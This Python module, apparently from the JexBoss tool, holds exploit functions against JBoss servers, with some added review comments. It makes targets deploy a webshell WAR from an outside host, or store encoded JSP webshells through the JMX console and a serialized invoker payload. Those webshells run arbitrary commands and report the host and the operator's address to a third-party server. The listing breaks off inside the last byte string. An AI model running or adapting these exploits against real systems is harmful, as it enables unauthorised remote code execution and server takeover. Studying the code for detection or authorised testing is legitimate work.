
# -*- coding: utf-8 -*-
"""
Module to group exploits of the JexBoss
https://github.com/joaomatosf/jexboss
Copyright 2013 João Filho Matos Figueiredo
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from jexboss import *
from random import randint
import urllib
from sys import version_info
if version_info[0] >= 3:
from urllib.parse import quote
def exploit_jmx_console_main_deploy(url):
    """
    Ask the JMX console's MainDeployer MBean to deploy a remotely hosted WAR.

    A single HEAD request goes to /jmx-console/HtmlAdaptor, invoking
    jboss.system:service=MainDeployer (methodIndex=19) with the WAR URL as
    arg0. No credentials are sent. Per the original author this does not
    work in JBoss 5 (bug in JBoss 5).

    NOTE(review): the WAR is fetched by the target itself from a third-party
    host over plain HTTP, so its content is outside the operator's control.
    The request to /jmx-console/HtmlAdaptor and the later probe of
    /jexws3/jexws3.jsp are the artefacts this leaves in access logs.

    :param url: The url to exploit; "http://" is prepended when its first
        four characters do not contain "http"
    :return: The value of get_successfully(url, "/jexws3/jexws3.jsp");
        presumably an HTTP status code -- confirm against jexboss
    """
    if 'http' not in url[:4]:
        url = "http://" + url

    war_location = "http://www.joaomatosf.com/rnp/jexws3.war"
    deploy_query = "".join((
        "/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=",
        "MainDeployer&methodIndex=19&arg0=",
        war_location,
    ))

    banner = (GREEN + "\n * Info: This exploit will force the server to deploy the webshell "
              + "\n available at: " + war_location + ENDC)
    print(banner)

    # The User-Agent is drawn at random from the list supplied by jexboss.
    chosen_agent = user_agents[randint(0, len(user_agents) - 1)]
    request_headers = {
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Connection": "keep-alive",
        "User-Agent": chosen_agent,
    }
    pool.request('HEAD', url + deploy_query, redirect=False, headers=request_headers)
    return get_successfully(url, "/jexws3/jexws3.jsp")
def exploit_jmx_console_file_repository(url):
    """
    Store a JSP file on the target through the DeploymentFileRepository MBean.

    One HEAD request to /jmx-console/HtmlAdaptor invokes
    jboss.admin:service=DeploymentFileRepository, method "store", with the
    arguments jexws3.war, jexws3, .jsp, the percent-encoded JSP source and
    True. No credentials are sent.
    Per the original author: tested and working in JBoss 4, 5; does not
    work in JBoss 6.

    NOTE(review): unlike exploit_jmx_console_main_deploy, no "http://"
    scheme is prepended here; url is used exactly as given.

    :param url: The URL to exploit
    :return: The value of get_successfully(url, "/jexws3/jexws3.jsp");
        presumably an HTTP status code -- confirm against jexboss
    """
    # Percent-encoded JSP source. Decoded, the page passes the request
    # parameter "ppp" to Runtime.exec (prefixed with "cmd.exe /C " on
    # Windows) and prints the command output.
    # NOTE(review): unless a request carries the header "check-updates: false",
    # the page can also make an outbound request to
    # http://webshell.jexboss.net/jsp_version.txt with the User-Agent set to
    # the request's Host header + "<-" + the client address, i.e. the tested
    # host and the operator's address are disclosed to a third party.
    # Detection artefacts on the target: the /jexws3/jexws3.jsp path, the
    # "ppp" parameter and that outbound request.
    jsp = ("%3C%25%40%20%70%61%67%65%20%69%6D%70%6F%72%74%3D%22%6A%61%76%61%2E%75%74%69%6C%2E%2A"
           "%2C%6A%61%76%61%2E%69%6F%2E%2A%2C%20%6A%61%76%61%2E%6E%65%74%2E%2A%22%20%70%61%67%65%45"
           "%6E%63%6F%64%69%6E%67%3D%22%55%54%46%2D%38%22%25%3E%20%3C%70%72%65%3E%20%3C%25%20%69%6E"
           "%74%20%76%65%72%73%69%6F%6E%20%3D%20%33%3B%20%69%66%20%28%72%65%71%75%65%73%74%2E%67%65"
           "%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29%20%21%3D%20%6E%75%6C%6C%29%20%7B%20"
           "%62%6F%6F%6C%65%61%6E%20%63%68%65%63%6B%55%70%64%61%74%65%73%3B%20%48%74%74%70%55%52%4C"
           "%43%6F%6E%6E%65%63%74%69%6F%6E%20%63%6F%6E%6E%43%68%65%63%6B%55%70%64%61%74%65%73%20%3D"
           "%20%6E%75%6C%6C%3B%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%62%72%20%3D%20%6E%75"
           "%6C%6C%3B%20%72%65%73%70%6F%6E%73%65%2E%73%65%74%43%6F%6E%74%65%6E%74%54%79%70%65%28%22"
           "%74%65%78%74%2F%68%74%6D%6C%22%29%3B%20%69%66%20%28%72%65%71%75%65%73%74%2E%67%65%74%48"
           "%65%61%64%65%72%28%22%63%68%65%63%6B%2D%75%70%64%61%74%65%73%22%29%20%21%3D%20%6E%75%6C"
           "%6C%20%26%26%20%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%63%68%65%63%6B"
           "%2D%75%70%64%61%74%65%73%22%29%2E%65%71%75%61%6C%73%28%22%66%61%6C%73%65%22%29%29%7B%20"
           "%63%68%65%63%6B%55%70%64%61%74%65%73%20%3D%20%66%61%6C%73%65%3B%20%7D%65%6C%73%65%20%7B"
           "%20%63%68%65%63%6B%55%70%64%61%74%65%73%20%3D%20%74%72%75%65%3B%20%63%6F%6E%6E%43%68%65"
           "%63%6B%55%70%64%61%74%65%73%20%3D%20%28%48%74%74%70%55%52%4C%43%6F%6E%6E%65%63%74%69%6F"
           "%6E%29%20%6E%65%77%20%55%52%4C%28%22%68%74%74%70%3A%2F%2F%77%65%62%73%68%65%6C%6C%2E%6A"
           "%65%78%62%6F%73%73%2E%6E%65%74%2F%6A%73%70%5F%76%65%72%73%69%6F%6E%2E%74%78%74%22%29%2E"
           "%6F%70%65%6E%43%6F%6E%6E%65%63%74%69%6F%6E%28%29%3B%20%7D%20%53%74%72%69%6E%67%20%73%68"
           "%20%3D%20%72%65%71%75%65%73%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22"
           "%29%3B%20%53%74%72%69%6E%67%20%6C%61%73%74%48%6F%75%72%43%68%65%63%6B%20%3D%20%28%6E%65"
           "%77%20%44%61%74%65%28%29%2E%74%6F%53%74%72%69%6E%67%28%29%2E%73%70%6C%69%74%28%22%3A%22"
           "%29%5B%30%5D%2B%22%68%2E%6C%6F%67%22%29%2E%72%65%70%6C%61%63%65%41%6C%6C%28%22%20%22%2C"
           "%20%22%2D%22%29%3B%20%74%72%79%7B%20%69%66%20%28%63%68%65%63%6B%55%70%64%61%74%65%73%20"
           "%3D%3D%20%74%72%75%65%29%7B%20%63%6F%6E%6E%43%68%65%63%6B%55%70%64%61%74%65%73%2E%73%65"
           "%74%52%65%71%75%65%73%74%50%72%6F%70%65%72%74%79%28%22%55%73%65%72%2D%41%67%65%6E%74%22"
           "%2C%20%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%48%6F%73%74%22%29%2B%22"
           "%3C%2D%22%2B%72%65%71%75%65%73%74%2E%67%65%74%52%65%6D%6F%74%65%41%64%64%72%28%29%29%3B"
           "%20%69%66%20%28%21%6E%65%77%20%46%69%6C%65%28%22%63%68%65%63%6B%5F%22%2B%6C%61%73%74%48"
           "%6F%75%72%43%68%65%63%6B%29%2E%65%78%69%73%74%73%28%29%29%7B%20%50%72%69%6E%74%57%72%69"
           "%74%65%72%20%77%72%69%74%65%72%20%3D%20%6E%65%77%20%50%72%69%6E%74%57%72%69%74%65%72%28"
           "%22%63%68%65%63%6B%5F%22%2B%6C%61%73%74%48%6F%75%72%43%68%65%63%6B%29%3B%20%77%72%69%74"
           "%65%72%2E%63%6C%6F%73%65%28%29%3B%20%62%72%20%3D%20%6E%65%77%20%42%75%66%66%65%72%65%64"
           "%52%65%61%64%65%72%28%6E%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61%64%65%72%28"
           "%63%6F%6E%6E%43%68%65%63%6B%55%70%64%61%74%65%73%2E%67%65%74%49%6E%70%75%74%53%74%72%65"
           "%61%6D%28%29%29%29%3B%20%69%6E%74%20%6C%61%73%74%56%65%72%73%69%6F%6E%20%3D%20%49%6E%74"
           "%65%67%65%72%2E%70%61%72%73%65%49%6E%74%28%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%2E%73"
           "%70%6C%69%74%28%22%20%22%29%5B%31%5D%29%3B%20%69%66%20%28%6C%61%73%74%56%65%72%73%69%6F"
           "%6E%20%3E%20%76%65%72%73%69%6F%6E%29%7B%20%6F%75%74%2E%70%72%69%6E%74%28%22%50%6C%65%61"
           "%73%65%20%6E%6F%74%65%3A%20%74%68%65%72%65%20%69%73%20%61%6E%20%75%70%64%61%74%65%20%74"
           "%6F%20%4A%65%78%42%6F%73%73%20%4A%53%50%20%57%65%62%73%68%65%6C%6C%2E%20%57%65%20%72%65"
           "%63%6F%6D%6D%65%6E%64%20%74%68%61%74%20%79%6F%75%20%72%65%72%75%6E%20%74%68%65%20%4A%65"
           "%78%42%6F%73%73%20%74%6F%20%72%65%64%65%70%6C%6F%79%20%74%68%65%20%6E%65%77%20%76%65%72"
           "%73%69%6F%6E%20%6F%66%20%77%65%62%73%68%65%6C%6C%20%69%6E%20%4A%42%6F%73%73%20%73%65%72"
           "%76%65%72%20%74%65%73%74%65%64%2E%22%29%3B%20%7D%20%7D%20%65%6C%73%65%20%69%66%20%28%73"
           "%68%2E%63%6F%6E%74%61%69%6E%73%28%22%69%64%22%29%20%7C%7C%20%73%68%2E%63%6F%6E%74%61%69"
           "%6E%73%28%22%69%70%63%6F%6E%66%69%67%22%29%29%20%7B%20%63%6F%6E%6E%43%68%65%63%6B%55%70"
           "%64%61%74%65%73%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%3B%20%7D%20%7D%20%7D"
           "%20%63%61%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%7B%6F%75%74%2E%70%72%69%6E%74"
           "%6C%6E%28%22%45%72%72%6F%72%20%63%68%65%63%6B%69%6E%67%20%66%6F%72%20%75%70%64%61%74%65"
           "%73%22%29%3B%7D%20%74%72%79%20%7B%20%50%72%6F%63%65%73%73%20%70%3B%20%69%66%20%28%53%79"
           "%73%74%65%6D%2E%67%65%74%50%72%6F%70%65%72%74%79%28%22%6F%73%2E%6E%61%6D%65%22%29%2E%74"
           "%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%77%69%6E%22%29%20%3E"
           "%20%30%20%7C%7C%20%21%53%79%73%74%65%6D%2E%67%65%74%50%72%6F%70%65%72%74%79%28%22%66%69"
           "%6C%65%2E%73%65%70%61%72%61%74%6F%72%22%29%2E%65%71%75%61%6C%73%28%22%2F%22%29%29%7B%20"
           "%70%20%3D%20%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63"
           "%28%22%63%6D%64%2E%65%78%65%20%2F%43%20%22%2B%73%68%29%3B%20%7D%20%65%6C%73%65%20%7B%20"
           "%70%20%3D%20%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63"
           "%28%73%68%29%3B%20%7D%20%62%72%20%3D%20%6E%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64"
           "%65%72%28%6E%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61%64%65%72%28%70%2E%67%65"
           "%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%29%29%3B%20%53%74%72%69%6E%67%20%64%69%73%72"
           "%20%3D%20%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%3B%20%77%68%69%6C%65%20%28%64%69%73%72"
           "%20%21%3D%20%6E%75%6C%6C%29%20%7B%20%6F%75%74%2E%70%72%69%6E%74%6C%6E%28%64%69%73%72%29"
           "%3B%20%64%69%73%72%20%3D%20%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%3B%20%7D%20%7D%63%61"
           "%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%20%7B%20%6F%75%74%2E%70%72%69%6E%74%6C"
           "%6E%28%22%55%6E%6B%6E%6F%77%6E%20%63%6F%6D%6D%61%6E%64%2E%22%29%3B%20%7D%20%7D%20%25%3E")
    # The JSP source travels as arg3 of the MBean operation, in the query
    # string of the request.
    payload = ("/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service="
               "DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0="
               "jexws3.war&argType=java.lang.String&arg1=jexws3&argType=java.lang.St"
               "ring&arg2=.jsp&argType=java.lang.String&arg3=" + jsp + "&argType=boolean&arg4=True")
    headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
               "Connection": "keep-alive",
               "User-Agent": user_agents[randint(0, len(user_agents) - 1)]}
    # The response to the HEAD request is discarded; the outcome is judged
    # only by probing the path where the JSP should now be served.
    pool.request('HEAD', url + payload, redirect=False, headers=headers)
    return get_successfully(url, "/jexws3/jexws3.jsp")
def exploit_jmx_invoker_file_repository(url, version):
    """
    Store a JSP file on the target through the JMX invoker servlet.

    POSTs a Java-serialized invocation to /invoker/JMXInvokerServlet that
    calls "store" on jboss.admin:service=DeploymentFileRepository, with the
    JSP source carried inside the serialized data. No credentials are sent.
    Per the original author: tested and works in JBoss 4, 5.

    :param url: The URL to exploit
    :param version: Selects one of two 4-byte values spliced into the
        stream (0 picks the first, anything else the second); presumably a
        server-version-specific value -- confirm against the caller
    :return: The value of get_successfully(url, "/jexinv3/jexinv3.jsp");
        presumably an HTTP status code -- confirm against jexboss
    """
    # Java serialization stream (magic bytes \xac\xed\x00\x05) for an
    # org.jboss.invocation.MarshalledInvocation, up to the java.lang.Integer
    # whose value is appended next.
    payload = ("\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e"
               "\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d\x61\x72\x73\x68\x61\x6c\x6c"
               "\x65\x64\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\xf6\x06\x95\x27\x41\x3e\xa4"
               "\xbe\x0c\x00\x00\x78\x70\x70\x77\x08\x78\x94\x98\x47\xc1\xd0\x53\x87\x73\x72"
               "\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72"
               "\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65"
               "\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65"
               "\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70")
    # The only part of the stream that depends on the version argument.
    payload += ("\xe3\x2c\x60\xe6") if version == 0 else ("\x26\x95\xbe\x0a")
    # Remainder: an org.jboss.invocation.MarshalledValue holding the target
    # ObjectName (jboss.admin:service=DeploymentFileRepository), the operation
    # name "store" and its arguments jexinv3.war, jexinv3, .jsp, the JSP
    # source and a Boolean, followed by the String[] signature.
    # NOTE(review): the embedded JSP reads the same "ppp" parameter and
    # contains the same update check against
    # http://webshell.jexboss.net/jsp_version.txt as the page stored by
    # exploit_jmx_console_file_repository, so the same third-party disclosure
    # applies. Detection artefacts: POSTs of
    # application/x-java-serialized-object to /invoker/JMXInvokerServlet and
    # requests for /jexinv3/jexinv3.jsp.
    payload += (
        "\x73\x72\x00\x24\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61"
        "\x74\x69\x6f\x6e\x2e\x4d\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x56\x61\x6c\x75"
        "\x65\xea\xcc\xe0\xd1\xf4\x4a\xd0\x99\x0c\x00\x00\x78\x70\x7a\x00\x00\x04\x00"
        "\x00\x00\x08\xb4\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e"
        "\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29"
        "\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x04\x73\x72\x00\x1b\x6a\x61\x76\x61\x78"
        "\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e"
        "\x61\x6d\x65\x0f\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x2c"
        "\x6a\x62\x6f\x73\x73\x2e\x61\x64\x6d\x69\x6e\x3a\x73\x65\x72\x76\x69\x63\x65"
        "\x3d\x44\x65\x70\x6c\x6f\x79\x6d\x65\x6e\x74\x46\x69\x6c\x65\x52\x65\x70\x6f"
        "\x73\x69\x74\x6f\x72\x79\x78\x74\x00\x05\x73\x74\x6f\x72\x65\x75\x71\x00\x7e"
        "\x00\x00\x00\x00\x00\x05\x74\x00\x0b\x6a\x65\x78\x69\x6e\x76\x33\x2e\x77\x61"
        "\x72\x74\x00\x07\x6a\x65\x78\x69\x6e\x76\x33\x74\x00\x04\x2e\x6a\x73\x70\x74"
        "\x07\x79\x3c\x25\x40\x20\x70\x61\x67\x65\x20\x69\x6d\x70\x6f\x72\x74\x3d\x22"
        "\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x2a\x2c\x6a\x61\x76\x61\x2e\x69\x6f"
        "\x2e\x2a\x2c\x20\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x2a\x22\x20\x70\x61\x67"
        "\x65\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\x2d\x38\x22\x25\x3e"
        "\x20\x3c\x70\x72\x65\x3e\x20\x3c\x25\x20\x69\x6e\x74\x20\x76\x65\x72\x73\x69"
        "\x6f\x6e\x20\x3d\x20\x33\x3b\x20\x69\x66\x20\x28\x72\x65\x71\x75\x65\x73\x74"
        "\x2e\x67\x65\x74\x50\x61\x72\x61\x6d\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22"
        "\x29\x20\x21\x3d\x20\x6e\x75\x6c\x6c\x29\x20\x7b\x20\x62\x6f\x6f\x6c\x65\x61"
        "\x6e\x20\x63\x68\x65\x63\x6b\x55\x70\x64\x61\x74\x65\x73\x3b\x20\x48\x74\x74"
        "\x70\x55\x52\x4c\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x20\x63\x6f\x6e\x6e"
        "\x43\x68\x65\x63\x6b\x55\x70\x64\x61\x74\x65\x73\x20\x3d\x20\x6e\x75\x6c\x6c"
        "\x3b\x20\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61\x64\x65\x72\x20\x62\x72"
        "\x20\x3d\x20\x6e\x75\x6c\x6c\x3b\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x73"
        "\x65\x74\x43\x6f\x6e\x74\x65\x6e\x74\x54\x79\x70\x65\x28\x22\x74\x65\x78\x74"
        "\x2f\x68\x74\x6d\x6c\x22\x29\x3b\x20\x69\x66\x20\x28\x72\x65\x71\x75\x65\x73"
        "\x74\x2e\x67\x65\x74\x48\x65\x61\x64\x65\x72\x28\x22\x63\x68\x65\x63\x6b\x2d"
        "\x75\x70\x64\x61\x74\x65\x73\x22\x29\x20\x21\x3d\x20\x6e\x75\x6c\x6c\x20\x26"
        "\x26\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x48\x65\x61\x64\x65\x72"
        "\x28\x22\x63\x68\x65\x63\x6b\x2d\x75\x70\x64\x61\x74\x65\x73\x22\x29\x2e\x65"
        "\x71\x75\x61\x6c\x73\x28\x22\x66\x61\x6c\x73\x65\x22\x29\x29\x7b\x20\x63\x68"
        "\x65\x63\x6b\x55\x70\x64\x61\x74\x65\x73\x20\x3d\x20\x66\x61\x6c\x73\x65\x3b"
        "\x20\x7d\x65\x6c\x73\x65\x20\x7b\x20\x63\x68\x65\x63\x6b\x55\x70\x64\x61\x74"
        "\x65\x73\x20\x3d\x20\x74\x72\x75\x65\x3b\x20\x63\x6f\x6e\x6e\x43\x68\x65\x63"
        "\x6b\x55\x70\x64\x61\x74\x65\x73\x20\x3d\x20\x28\x48\x74\x74\x70\x55\x52\x4c"
        "\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x29\x20\x6e\x65\x77\x20\x55\x52\x4c"
        "\x28\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x65\x62\x73\x68\x65\x6c\x6c\x2e\x6a"
        "\x65\x78\x62\x6f\x73\x73\x2e\x6e\x65\x74\x2f\x6a\x73\x70\x5f\x76\x65\x72\x73"
        "\x69\x6f\x6e\x2e\x74\x78\x74\x22\x29\x2e\x6f\x70\x65\x6e\x43\x6f\x6e\x6e\x65"
        "\x63\x74\x69\x6f\x6e\x28\x29\x3b\x20\x7d\x20\x53\x74\x72\x69\x6e\x67\x20\x73"
        "\x68\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61"
        "\x6d\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22\x29\x3b\x20\x53\x74\x72\x69\x6e"
        "\x67\x20\x6c\x61\x73\x74\x48\x6f\x75\x72\x43\x68\x65\x63\x6b\x20\x3d\x20\x28"
        "\x6e\x65\x77\x20\x44\x61\x74\x65\x28\x29\x2e\x74\x6f\x53\x74\x72\x69\x6e\x67"
        "\x28\x29\x2e\x73\x70\x6c\x69\x74\x28\x22\x3a\x22\x29\x5b\x30\x5d\x2b\x22\x68"
        "\x2e\x6c\x6f\x67\x22\x29\x2e\x72\x65\x70\x6c\x61\x63\x65\x41\x6c\x6c\x28\x22"
        "\x20\x22\x2c\x20\x22\x2d\x22\x29\x3b\x20\x74\x72\x79\x7b\x20\x69\x66\x20\x28"
        "\x63\x68\x65\x63\x6b\x55\x70\x64\x61\x74\x65\x73\x20\x3d\x3d\x20\x74\x72\x75"
        "\x65\x29\x7b\x20\x63\x6f\x6e\x6e\x43\x68\x65\x63\x6b\x55\x70\x64\x61\x74\x65"
        "\x73\x2e\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x50\x72\x6f\x70\x65\x72\x74"
        "\x79\x28\x22\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x22\x2c\x20\x72\x65\x71"
        "\x75\x65\x73\x74\x2e\x67\x65\x74\x48\x65\x61\x64\x65\x72\x28\x22\x48\x6f\x73"
        "\x74\x22\x29\x2b\x22\x3c\x2d\x22\x2b\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65"
        "\x74\x52\x65\x6d\x6f\x74\x65\x41\x64\x64\x72\x28\x29\x29\x3b\x20\x69\x66\x20"
        "\x28\x21\x6e\x65\x77\x20\x46\x69\x6c\x65\x28\x22\x63\x68\x65\x63\x6b\x7a\x00"
        "\x00\x04\x00\x5f\x22\x2b\x6c\x61\x73\x74\x48\x6f\x75\x72\x43\x68\x65\x63\x6b"
        "\x29\x2e\x65\x78\x69\x73\x74\x73\x28\x29\x29\x7b\x20\x50\x72\x69\x6e\x74\x57"
        "\x72\x69\x74\x65\x72\x20\x77\x72\x69\x74\x65\x72\x20\x3d\x20\x6e\x65\x77\x20"
        "\x50\x72\x69\x6e\x74\x57\x72\x69\x74\x65\x72\x28\x22\x63\x68\x65\x63\x6b\x5f"
        "\x22\x2b\x6c\x61\x73\x74\x48\x6f\x75\x72\x43\x68\x65\x63\x6b\x29\x3b\x20\x77"
        "\x72\x69\x74\x65\x72\x2e\x63\x6c\x6f\x73\x65\x28\x29\x3b\x20\x62\x72\x20\x3d"
        "\x20\x6e\x65\x77\x20\x42\x75\x66\x66\x65\x72\x65\x64\x52\x65\x61\x64\x65\x72"
        "\x28\x6e\x65\x77\x20\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x52\x65\x61"
        "\x64\x65\x72\x28\x63\x6f\x6e\x6e\x43\x68\x65\x63\x6b\x55\x70\x64\x61\x74\x65"
        "\x73\x2e\x67\x65\x74\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x29"
        "\x29\x3b\x20\x69\x6e\x74\x20\x6c\x61\x73\x74\x56\x65\x72\x73\x69\x6f\x6e\x20"
        "\x3d\x20\x49\x6e\x74\x65\x67\x65\x72\x2e\x70\x61\x72\x73\x65\x49\x6e\x74\x28"
        "\x62\x72\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x2e\x73\x70\x6c\x69\x74"
        "\x28\x22\x20\x22\x29\x5b\x31\x5d\x29\x3b\x20\x69\x66\x20\x28\x6c\x61\x73\x74"
        "\x56\x65\x72\x73\x69\x6f\x6e\x20\x3e\x20\x76\x65\x72\x73\x69\x6f\x6e\x29\x7b"
        "\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x28\x22\x50\x6c\x65\x61\x73\x65\x20"
        "\x6e\x6f\x74\x65\x3a\x20\x74\x68\x65\x72\x65\x20\x69\x73\x20\x61\x6e\x20\x75"
        "\x70\x64\x61\x74\x65\x20\x74\x6f\x20\x4a\x65\x78\x42\x6f\x73\x73\x20\x4a\x53"
        "\x50\x20\x57\x65\x62\x73\x68\x65\x6c\x6c\x2e\x20\x57\x65\x20\x72\x65\x63\x6f"
        "\x6d\x6d\x65\x6e\x64\x20\x74\x68\x61\x74\x20\x79\x6f\x75\x20\x72\x65\x72\x75"
        "\x6e\x20\x74\x68\x65\x20\x4a\x65\x78\x42\x6f\x73\x73\x20\x74\x6f\x20\x72\x65"
        "\x64\x65\x70\x6c\x6f\x79\x20\x74\x68\x65\x20\x6e\x65\x77\x20\x76\x65\x72\x73"
        "\x69\x6f\x6e\x20\x6f\x66\x20\x77\x65\x62\x73\x68\x65\x6c\x6c\x20\x69\x6e\x20"
        "\x4a\x42\x6f\x73\x73\x20\x73\x65\x72\x76\x65\x72\x20\x74\x65\x73\x74\x65\x64"
        "\x2e\x22\x29\x3b\x20\x7d\x20\x7d\x20\x65\x6c\x73\x65\x20\x69\x66\x20\x28\x73"
        "\x68\x2e\x63\x6f\x6e\x74\x61\x69\x6e\x73\x28\x22\x69\x64\x22\x29\x20\x7c\x7c"
        "\x20\x73\x68\x2e\x63\x6f\x6e\x74\x61\x69\x6e\x73\x28\x22\x69\x70\x63\x6f\x6e"
        "\x66\x69\x67\x22\x29\x29\x20\x7b\x20\x63\x6f\x6e\x6e\x43\x68\x65\x63\x6b\x55"
        "\x70\x64\x61\x74\x65\x73\x2e\x67\x65\x74\x49\x6e\x70\x75\x74\x53\x74\x72\x65"
        "\x61\x6d\x28\x29\x3b\x20\x7d\x20\x7d\x20\x7d\x20\x63\x61\x74\x63\x68\x28\x45"
        "\x78\x63\x65\x70\x74\x69\x6f\x6e\x20\x65\x29\x7b\x6f\x75\x74\x2e\x70\x72\x69"
        "\x6e\x74\x6c\x6e\x28\x22\x45\x72\x72\x6f\x72\x20\x63\x68\x65\x63\x6b\x69\x6e"
        "\x67\x20\x66\x6f\x72\x20\x75\x70\x64\x61\x74\x65\x73\x22\x29\x3b\x7d\x20\x74"
        "\x72\x79\x20\x7b\x20\x50\x72\x6f\x63\x65\x73\x73\x20\x70\x3b\x20\x69\x66\x20"
        "\x28\x53\x79\x73\x74\x65\x6d\x2e\x67\x65\x74\x50\x72\x6f\x70\x65\x72\x74\x79"
        "\x28\x22\x6f\x73\x2e\x6e\x61\x6d\x65\x22\x29\x2e\x74\x6f\x4c\x6f\x77\x65\x72"
        "\x43\x61\x73\x65\x28\x29\x2e\x69\x6e\x64\x65\x78\x4f\x66\x28\x22\x77\x69\x6e"
        "\x22\x29\x20\x3e\x20\x30\x20\x7c\x7c\x20\x21\x53\x79\x73\x74\x65\x6d\x2e\x67"
        "\x65\x74\x50\x72\x6f\x70\x65\x72\x74\x79\x28\x22\x66\x69\x6c\x65\x2e\x73\x65"
        "\x70\x61\x72\x61\x74\x6f\x72\x22\x29\x2e\x65\x71\x75\x61\x6c\x73\x28\x22\x2f"
        "\x22\x29\x29\x7b\x20\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67\x65"
        "\x74\x52\x75\x6e\x74\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63\x28\x22\x63\x6d"
        "\x64\x2e\x65\x78\x65\x20\x2f\x43\x20\x22\x2b\x73\x68\x29\x3b\x20\x7d\x20\x65"
        "\x6c\x73\x65\x20\x7b\x20\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67"
        "\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63\x28\x73\x68"
        "\x29\x3b\x20\x7d\x20\x62\x72\x20\x3d\x20\x6e\x65\x77\x20\x42\x75\x66\x66\x65"
        "\x72\x65\x64\x52\x65\x61\x64\x65\x72\x28\x6e\x65\x77\x20\x49\x6e\x70\x75\x74"
        "\x53\x74\x72\x65\x61\x6d\x52\x65\x61\x64\x65\x72\x28\x70\x2e\x67\x65\x74\x49"
        "\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x29\x29\x3b\x20\x53\x74\x72"
        "\x69\x6e\x67\x20\x64\x69\x73\x72\x20\x3d\x20\x62\x72\x2e\x72\x65\x61\x64\x4c"
        "\x69\x6e\x65\x28\x29\x3b\x20\x77\x68\x69\x6c\x65\x20\x28\x64\x69\x73\x72\x20"
        "\x21\x3d\x20\x6e\x75\x6c\x6c\x29\x20\x7b\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e"
